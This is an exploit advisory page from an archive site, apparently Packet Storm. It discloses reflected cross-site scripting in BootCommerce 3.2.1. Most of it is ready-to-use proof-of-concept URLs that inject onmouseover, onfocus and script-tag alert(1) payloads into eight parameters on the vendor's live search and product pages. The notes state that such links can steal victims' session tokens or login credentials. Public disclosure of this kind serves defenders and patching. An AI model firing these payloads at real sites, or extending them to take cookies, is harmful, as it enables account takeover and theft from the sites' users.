what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BootCommerce 3.2.1 Cross Site Scripting

BootCommerce 3.2.1 Cross Site Scripting
Posted Jan 17, 2023
Authored by CraCkEr

BootCommerce version 3.2.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 6d5796f9801a7d1f1732695df868a18f334edfb6724d195e9b53613cd8c89440

BootCommerce 3.2.1 Cross Site Scripting

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.mrplugins.it/bootcommerce/ │
│ Vendor : MrPlugins │
│ Software : BootCommerce 3.2.1 │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /bootcommerce/search.php


URL parameter 'sp' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tvbmhz4%22onfocus%3d%22alert(1)%22autofocus%3d%22dlit2&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t


URL parameter 'of' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=falsekav5w%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h0xj6&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'sp_n' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=tl31l3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h93cp&sp_t=t&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'sp_t' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=tlelcw%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22lho07&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'sp_d' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=trhpfz%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22nfcub&sp_mk=t&sp_w=t

URL parameter 'sp_mk' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb&sp_w=t

URL parameter 'sp_w' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=&sp_w=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb


Path: /bootcommerce/content/products/Books/

URL parameter 'prc' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/content/products/Books/?p=1&prcq3h55%22%3E%3Cscript%3Ealert(1)%3C/script%3Egwsd7&of=false

[-] Done
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close